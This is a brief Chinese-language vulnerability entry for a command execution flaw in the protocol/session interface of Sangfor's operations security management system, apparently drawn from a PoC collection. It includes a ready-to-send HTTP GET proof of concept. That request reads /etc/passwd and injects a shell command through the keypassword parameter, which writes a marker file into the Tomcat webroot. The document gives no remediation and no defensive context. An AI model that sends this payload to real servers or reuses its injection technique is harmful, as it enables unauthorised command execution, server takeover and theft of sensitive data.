漏洞描述
深信服运维安全管理系统是一款用于企业网络安全管理的综合性解决方案,提供多种安全功能以保障企业网络的安全性。系统的 protocol/session 接口存在命令执行漏洞,攻击者可以通过该漏洞执行任意系统命令,从而控制服务器或窃取敏感信息。
深信服运维安全管理系统 protocol/session 命令执行漏洞
PoC代码
GET /isomp-protocol/protocol/session?keyPath=/etc/passwd&protocol=ssh&keypassword=123456%27%3Becho+fd827c76d2+%3E%20/usr/local/tomcat/webapps/fort/trust/version/randomstr.txt;&sshd=1 HTTP/1.1